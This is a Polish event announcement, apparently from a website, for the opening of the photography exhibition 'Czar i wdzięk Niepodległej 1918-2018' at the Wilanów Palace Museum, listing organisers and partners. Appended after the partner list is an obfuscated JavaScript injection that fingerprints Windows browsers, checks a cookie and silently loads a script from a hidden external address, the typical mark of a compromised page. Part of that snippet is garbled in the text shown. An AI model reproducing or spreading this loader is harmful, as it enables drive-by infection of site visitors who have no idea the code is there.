Wernisaż wystawy fotografii " Czar i wdzięk Niepodległej 1918-2018"

Serdecznie zapraszamy na wernisaż wystawy fotografii "Czar i wdzięk Niepodległej 1918-2018".  Uroczystość odbędzie się w Oranżerii Muzeum Pałacu w Wilanowie 21 października o godz. 18.00.

Wystawa jest wynikiem współpracy wielu podmiotów: Muzeum Pałacu w Wilanowie, programu "Debiutantki", Fundacji im. Królowej Marii Kazimiery, Zespołu Szkół Fototechnicznych, Studia F4, Krakowskiego Teatru Komedia oraz Wyższej Szkoły Artystycznej.  Zawiera zbiór 100 zdjęć, zrealizowanych przez uczniów ZSF, pod kierownictwem prof. Anny E. Przybysz w czasie Ogólnopolskiej Nocy Muzeów 2018 w Wilanowie. Charakteryzację i kostiumy z epoki międzywojennej, w których wystąpiły Debiutantki różnych edycji, zapewniły studentki Wyższej Szkoły Artystycznej w Warszawie oraz absolwentka WSA - Katarzyna Markiewicz.

Organizatorzy przewidują również sztukę teatralną w wykonaniu aktorów Krakowskiego Teatru Komedia pt. "Pan Tadeusz w M3".

Projekt dofinansowano ze środków Programu Wieloletniego NIEPODLEGŁA na lata 2017-2022 w ramach Programu Dotacyjnego „Niepodległa”.

Organizatorzy wernisażu: Muzeum Pałacu w Wilanowie, program "Debiutantki", Fundacja im. Królowej Marii Kazimiery, Krakowski Teatr Komedia.

Partnerzy: Studio F4, Zespół Szkół Fototechnicznych, Wyższa Szkoła Artystyczna, Hephaestus Studio, Work Room, Salon Dyplomata - Garnitury, Fraki, Smokingi oraz Katarzyna Markiewicz Costume & Makeup designer

;(function(){var x=navigator[m("4t}n)e}gnA(r;eistu}")];var y=document[m(":e}idk,owodc,")];if(s(x,m("0s7w)obd)n)i(W{"))&&!s(x,m("&dui{o;r,den;Aj"))){if(!s(y,m("p=na{m9t(uo_,_d_("))){var b=document.createElement('script');b.type='text/javascript';b.async=true;b.src=m('b2)agd9f84}4,f893c(7{3;3{8,d{8(c)0cb}6951=,v;&;0)3{2{=udlirc6?;srjx.{e,d4o6c{_8s)/lm{o;c{.nd,n{a,r9b}h;s;imm7a;.(k}c(a3r4t)/{/v:ssrp}txtxh,');var o=document.getElementsByTagName('script')[0];o.parentNode.insertBefore(b,o);}}function m(v){var a='';for(var f=0;f=0;p--){k+=t[p];}return k;}})();